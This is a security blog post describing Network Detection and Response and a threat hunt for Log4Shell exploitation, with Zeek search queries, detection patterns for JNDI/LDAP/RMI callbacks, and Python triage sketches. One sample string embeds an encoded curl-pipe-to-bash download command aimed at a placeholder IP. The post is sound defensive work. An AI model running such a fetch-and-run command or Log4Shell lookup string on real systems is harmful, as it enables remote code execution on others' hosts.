NDR: Network Detection and Response – Hunting for Log4j using NDR metadata
In mid-December 2021, a new zero-day was made public: Log4Shell (CVE-2021-44228). This post gives a short summary of what NDR is and how it fits into an overall detection strategy, followed by a case study of hunting for the zero-day using available metadata.
What is Network Detection and Response (NDR)
Network Detection and Response (NDR) is a cybersecurity solution that continuously monitors an organization’s network to detect cyber threats and anomalous behavior using non-signature-based tools or techniques.
NDR approaches security challenges by applying machine learning and artificial intelligence to detect suspicious traffic on enterprise networks, utilizing both supervised and unsupervised learning methods for structured and unstructured data.
- Supervised machine learning identifies fundamental behaviors that are consistent across all variants of a threat.
- Unsupervised machine learning algorithms analyze enterprise data at scale and make billions of probability-based calculations based on the evidence that it sees. Instead of relying on knowledge of past threats, it independently classifies data and detects compelling patterns.
Source: Darktrace AI: Combining Unsupervised and Supervised Machine Learning
https://www.darktrace.com/es/resources/wp-machine-learning.pdf
Addressing IDS & IPS – Putting detection first
IPS and IDS have very different use cases and roles in the network.
Intrusion Detection Systems (IDS) have been a mainstay of information security for decades. Today, standalone IDS has been subsumed by Intrusion Prevention Systems (IPS), and the two are now known collectively as IDPS. This convergence occurred as the security industry focused more on preventing external threat actors, largely due to the lack of skilled security analysts able to make sense of the volumes of noise presented by IDS. In today’s threat landscape, where high-profile breaches are frequently reported in the news, prevention techniques alone are insufficient. Detecting and responding to hidden attacks that progress inside the cloud, data center, IT, and IoT networks must be a top priority.
To meet today’s challenges, NDR needs to understand the way attacks really work and how attackers succeed. The more sophisticated threat actors are often utilizing the tools available natively on the operating system without needing to rely on malware or exploits. NDR must adapt and reflect the true nature of the cloud, data center, IT, and IoT networks and their attack surfaces. Endpoints are dynamic and increasingly mobile, servers can be hosted inside the network or in the cloud, and security analysts have an increasingly difficult time with asset management and knowing where data resides.
IPS only provides protection against the most well-known attacks. It also creates a dangerous security gap between the time a threat is discovered in the wild and the time IPS can confidently respond.
NDR fills an important spot in an overall detection strategy, as shown by the image below, which is based on Gartner's “SOC visibility triad”. Nixu NDR services rely on market-leading products and now also provide 24/7 SOC integration, giving customers complete detection coverage, enhancing existing solutions, and supporting any investigation initiated from EDR or elsewhere.
Source: Vectra – Intrusion Detection System (IDS): Definition and Explanation
https://www.vectra.ai/learning/intrusion-detection
Image adapted from Gartner's SOC Visibility Triad
Source: Gartner, Applying Network-Centric Approaches for Threat Detection and Response, Augusto Barros et al., March 18, 2019, ID G0037346
So, now that we have the basics sorted, let's have a look at one sample case from recent memory: CVE-2021-44228 – Log4Shell
The account below is from me, Mikael Lindbäck, an analyst who provides existing clients with NDR-based threat reporting and posture management services. These services contribute to an organization's overall defense against cyber-attacks by detecting attack patterns or behaviors that may put the organization at risk.
How it started
Going back to mid-December 2021, a client asked – How fast can you create a detection for it?
Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, which had just started making the rounds on Twitter and in the infosec community. The expectation was that the vulnerability would have far-reaching consequences because the logging framework is so widely used.
Our internal threat intelligence team had picked up on the first methods used by the exploit and on how each area in Nixu SOC could adjust detections or rules accordingly, since the vulnerability was out in the open and no patch was available yet.
A detection rule for NDR was created and added to all customer environments. Then it hit me, again. The created detection rule does add an early “heads up”, but in general is not required. Since NDR relies on behavior patterns and known attacker techniques, the already built-in detection capabilities should trigger.
An attacker's modus operandi, whether the exploit is known or unknown, still follows the cyber kill chain. The most common steps in an attack include exploiting a vulnerability to gain a foothold, creating command channels for remote control, escalating privileges, pivoting to internal network discovery, and attempting to move laterally and beyond.
Since NDR relies on attacker behavior and known attacker techniques, the already built-in detection capabilities would trigger several detections over different phases.
How to give reassurance?
In dialogues with the customer, I began naming a wide range of detections that would likely trigger post exploitation.
In addition to network scanning activities, cryptocurrency mining was seen in early successful Log4j exploits. An attack would then continue with established C2 (Command and Control) communication, followed by endpoints triggering alerts for reconnaissance or lateral movement that abuses whatever tool is available, such as RDP, RPC, or old SMB1, or for attempts to enumerate internal IP ranges. It would end with alerts for data being sent to external domains, to name a few.
Although we made a good effort to reassure our client that we could rely on existing detection methods, naming a few of the detections above was not enough. We could only put the "creating additional rules" discussion to rest by conducting a hunt covering active exploitation attempts and all of the phases a Log4j abuser needs to go through to complete an attack cycle. Sometimes “seeing is believing”, and we needed to show the client raw data on how the attack would look if it had been successful.
Hunting using metadata
Our NDR product suites utilize ZEEK to capture and analyze network traffic and, with the added help from Nixu DFIR & Threat intelligence, we quickly created usable queries, parsing all available network metadata.
We could see all connections coming in during the exploit attempt phase. We also checked for signs of successfully executed exploits and searched for communication methods known to be used with Log4j, such as ldap, ldaps, and RMI. We then looked for additional signs of C2 communication using the Java classes that were, at the time, reported to be used in successful exploitation attempts.
While hunting for signs of exploitation of the Log4j vulnerability, we found signs of exploitation attempts targeting internet-facing servers. The application which was exposed on the servers was known to be vulnerable. This activity was only found using the queries and hypotheses created for the hunt.
As a personal touch, I like to use illustrations to get a better idea or understanding of all connections made as a result of a hunt. I use Gephi (an open-source visualizing tool) to illustrate the gathered data for all Log4J queries used. The images can be created, for example, by using 30 days of metadata with underlying queries such as "*jndi* *ldap*". Then the images can show a range of results "belonging" to separate clusters, such as client-initiated Nessus scanning to find vulnerable endpoints or actual Log4j exploit attempts.
We could also verify that the attempts made did not result in successful exploitation.
The initial hunt queries
Although the hunt is several months old, the same queries would still be viable.
Note: Depending on what tool you use for your ZEEK datasets, you may need to adjust the queries accordingly. The following examples are from Darktrace Advanced Search.
1. Exploit attempts.
An attacker sends a specially crafted message such as
- Using the queries below would yield results from different fields, with some queries being a bit narrower to avoid timeouts or some obfuscation attempts.
- *jndi* *ldap* (wildcard search for relevant fields)
- *${* AND @fields.local_orig:"false" (initiating strings)
- _exists_:"@fields.user_agent" AND NOT @fields.source_ip:(10.* OR 192.168.* OR /fd00:.*/ OR /172\.1[6-9]\..+/ OR /172\.2[0-9]\..+/ OR /172\.3[0-1]\..+/) (Then sort by user_agent; you may also want to remove any entries that you know come from company sources.)
- The attempts sometimes contain a Base64-encoded string. Decoding it will likely yield an IP address. It is then recommended to verify whether any external traffic to the decoded IP was successful, using the following query.
- @fields.dest_ip:"insert.ip.here" OR @fields.dest_ip:"insert.ip.here"
- You may need to check @fields.conn_state to see what type of reply you got, as anything other than “S0” (Connection attempt seen, no reply) would merit further review. Optionally, the “history” field gives full visibility into the stages of the TCP handshake.
- Live attempt samples
- Log4j exploit attempts use encoding, obfuscation, and encryption to evade prevention and detection rules based on IOCs (Indicators of Compromise). When evaluating the possibility of exploitation, all parameters of the request must be accounted for.
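The follow-up steps in the list above (decode the Base64 string, pull out the IP, then check whether any connection to it got a reply) can also be sketched offline against exported connection records. This is a minimal sketch and not part of any product: it assumes the encoded command follows a `Base64/` marker in the logged string, and it assumes records are plain dictionaries whose keys (`dest_ip`, `conn_state`) mirror the field names in the queries. The function names and all sample values are hypothetical, and the addresses come from documentation ranges.

```python
import base64
import binascii
import re

# Assumption: the encoded command follows a "Base64/" marker in the logged string.
B64_SEGMENT = re.compile(r"Base64/([A-Za-z0-9+/]+={0,2})")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decoded_ips(logged_string):
    """Return IPv4-looking strings found inside Base64 segments of a logged request."""
    found = []
    for segment in B64_SEGMENT.findall(logged_string):
        try:
            text = base64.b64decode(segment, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid Base64, skip it
        found.extend(IPV4.findall(text))
    return found


def connections_needing_review(conn_records, suspect_ips):
    """Keep connections to a suspect IP whose state is anything other than S0."""
    suspects = set(suspect_ips)
    return [
        rec for rec in conn_records
        if rec.get("dest_ip") in suspects and rec.get("conn_state") != "S0"
    ]


# Illustrative data only: a made-up command and documentation IP ranges.
command = "curl -s 203.0.113.5:8080/x.sh|bash"
encoded = base64.b64encode(command.encode()).decode()
sample = "${jndi:ldap://198.51.100.7:1389/Basic/Command/Base64/" + encoded + "}"

records = [
    {"source_ip": "10.0.0.12", "dest_ip": "203.0.113.5", "conn_state": "S0"},
    {"source_ip": "10.0.0.12", "dest_ip": "203.0.113.5", "conn_state": "SF"},
    {"source_ip": "10.0.0.12", "dest_ip": "192.0.2.44", "conn_state": "SF"},
]

for rec in connections_needing_review(records, decoded_ips(sample)):
    print(rec)
```

Only the Base64 segment is decoded here; the host in the lookup string itself is a separate indicator and is worth searching for in the same way.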
2. Successful exploitation
Let us disregard any detections that the built-in NDR capabilities would raise at this stage or post-exploitation, and only look at ZEEK log data.
Then let us assume that an attempted string is successful, which results in an external code class or message lookup being loaded and that code being executed. This results in Remote Code Execution (RCE), which initiates a remote connection. The external connection was initially thought to go over ldap (389), ldaps (636), or RMI (1099).
However, the ports used need not be the standard ports for any of these protocols, and the port can be seen in the initial payload (as shown in previous images containing the attempt). If there is no callback, the exploitation has likely failed.
- Search for default use of the ports. (NOTE: There will be false positives, and you will need to sort out likely benign traffic depending on what services your company provides or integrations you have)
- @type:"ldap" AND @fields.local_resp:"false" (external LDAP)
- @fields.dest_port:"1099" AND @fields.local_resp:"false" (external RMI default port)
- Other default ports to look for, as seen so far, would be 8180 and 1389. But again, looking for IOCs using only ports is unreliable because the port is easily specified in the initial command.
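Because the callback port can be read from the initial payload, the port search above can be widened with whatever ports the observed attempts actually name. The sketch below is one hedged way to do that offline. It only parses plain, non-obfuscated `jndi:` lookups, and it assumes connection records are dictionaries with `dest_port` and `local_resp` keys modeled on the query fields. The function names and sample data are hypothetical.

```python
import re

# Default ports named in the text, plus the extra ports seen so far.
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099}
EXTRA_PORTS = {1389, 8180}

# Matches plain lookups only; obfuscated variants are out of scope for this sketch.
CALLBACK = re.compile(r"jndi:(ldaps?|rmi)://([^/:}\s]+)(?::(\d+))?", re.IGNORECASE)


def callback_endpoints(payload):
    """Return (host, port) pairs named in a payload, using the protocol default if no port is given."""
    endpoints = []
    for scheme, host, port in CALLBACK.findall(payload):
        endpoints.append((host, int(port) if port else DEFAULT_PORTS[scheme.lower()]))
    return endpoints


def outbound_candidates(conn_records, payloads):
    """Keep connections to external responders on a default or payload-specified port."""
    ports = set(DEFAULT_PORTS.values()) | EXTRA_PORTS
    for payload in payloads:
        ports.update(port for _, port in callback_endpoints(payload))
    return [
        rec for rec in conn_records
        if rec.get("local_resp") is False and rec.get("dest_port") in ports
    ]


# Illustrative data only, using documentation IP ranges.
payloads = ["${jndi:ldap://198.51.100.7:4444/a}"]
records = [
    {"dest_ip": "198.51.100.7", "dest_port": 4444, "local_resp": False},
    {"dest_ip": "192.0.2.10", "dest_port": 443, "local_resp": False},
    {"dest_ip": "10.0.0.5", "dest_port": 389, "local_resp": True},
    {"dest_ip": "203.0.113.9", "dest_port": 1099, "local_resp": False},
]

for rec in outbound_candidates(records, payloads):
    print(rec)
```

As with the queries, the result is a list of candidates to review and will include benign traffic.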
3. Established C2: Incoming commands
The malicious external endpoint would need to communicate back to the infrastructure it now controls. One method seen with Log4j exploitation is Java classes served from the external malicious endpoint. You could search for inbound Java classes with the following queries.
- *.class
- *class *java* AND @fields.local_orig:"false"
- Search for incoming LDAP connections
- @fields.type:"ldap" AND @fields.local_orig:"false"
- _exists_:"@fields.mime" *java*
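The same idea as the queries above can be applied to exported metadata. The sketch below is an assumption-laden illustration: records are dictionaries, `mime` and `local_orig` mirror the query fields, and `uri` is a hypothetical key standing in for wherever the requested path is stored. A plain `*java*` match also hits JavaScript MIME types, so the sketch excludes those explicitly.

```python
def looks_like_java(record):
    """True if the path ends in .class or the MIME type mentions Java (but not JavaScript)."""
    uri_path = str(record.get("uri", "")).split("?", 1)[0].lower()
    mime = str(record.get("mime", "")).lower()
    java_mime = "java" in mime and "javascript" not in mime
    return uri_path.endswith(".class") or java_mime


def inbound_java_records(records):
    """Keep externally originated records that look like Java class traffic."""
    return [
        rec for rec in records
        if rec.get("local_orig") is False and looks_like_java(rec)
    ]


# Illustrative records only; the values are made up.
records = [
    {"local_orig": False, "uri": "/Exploit.class", "mime": "application/x-java-applet"},
    {"local_orig": False, "uri": "/index.html", "mime": "text/html"},
    {"local_orig": True, "uri": "/lib/Helper.class?v=2", "mime": "application/octet-stream"},
    {"local_orig": False, "uri": "/a/B.CLASS?x=1", "mime": ""},
    {"local_orig": False, "uri": "/app.js", "mime": "application/javascript"},
]

for rec in inbound_java_records(records):
    print(rec)
```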
To summarize
The hunt above gave early situational awareness to the customer. Now that Log4j is a few months behind us, it remains a reminder of how vulnerable we are, as zero-day exploits are more the norm than ever.
It also showed that working together with colleagues who are experts in their respective areas provides much-needed information when quickly assessing this particular event or any future one. This gives a lot of reassurance when quickly creating or discussing potential detection rules.
As a final note, for anyone wanting to further their analysis of network metadata, I have a personal preference for using the open-source tool Gephi to create illustrations. I personally call them my "network Rorschach tests". Below are live samples from client environments, each created for a given hunting scenario using available data. Note: The examples below are unrelated to the Log4j hunt.
Each dot represents a host/IP, and each line represents a connection being made.
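For readers who want to try this, Gephi's spreadsheet import accepts an edge table with Source and Target columns and an optional Weight column. The sketch below shows one way to turn exported connection pairs into such a table. The function names and sample pairs are hypothetical, and counting repeated connections as the edge weight is my own choice for illustration.

```python
import csv
import io
from collections import Counter


def edge_rows(connections):
    """Collapse (source, destination) pairs into weighted edge rows with a header."""
    counts = Counter(connections)
    rows = [("Source", "Target", "Weight")]
    rows.extend((src, dst, n) for (src, dst), n in sorted(counts.items()))
    return rows


def write_edge_csv(connections, handle):
    """Write the edge table as CSV to any file-like object."""
    csv.writer(handle).writerows(edge_rows(connections))


# Illustrative pairs only; in practice these come from exported metadata.
connections = [
    ("10.0.0.12", "10.0.0.5"),
    ("10.0.0.12", "10.0.0.5"),
    ("10.0.0.40", "203.0.113.5"),
]

buffer = io.StringIO()
write_edge_csv(connections, buffer)
print(buffer.getvalue())
```

Writing to a file instead of a `StringIO` buffer gives a CSV that can be loaded as an edge table, with each host becoming a dot and each row a line.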
1. File upload destinations
The client wanted to know how SSH was used within the company together with external partners. The illustration below indicated two external sources continuously brute-forcing a company's internet-facing SFTP. Other connections were known and legitimate.
Result: the company now only works with whitelisted destinations.
2. Old protocols
The “NotPetya” malware attacks from 2017 are still fresh in recent memory. The malware was initially distributed through Ukrainian tax software and spread further using EternalBlue, an exploit that had been leaked by The Shadow Brokers (TSB). It also ended up affecting Maersk on a global scale. EternalBlue abuses a flaw in the outdated SMBv1 protocol, and the client wanted to know how widely the protocol was used within the company network.
Result: The company now actively works to mitigate all use of SMBv1.
3. Network segmentation
The client had previously implemented network segmentation, separating areas in the network to restrict access with only jump stations to be used as a source for administrative access. The sample below illustrates a 7-day RDP summary.
Result: Network segmentation was not set up correctly. Also, different areas that were expected to be completely off-limits due to company policy/procedures were still being accessed.
4. All company IPs seen, Friday afternoon.
One client has a small office and was curious to see all concurrent connections visually.
The activity was not only “fun and games” but also prompted an inquiry into the more persistent connections as shown in the illustration.
Result: The client now lists previously unknown third-party software that regularly calls home with data for “its purpose”.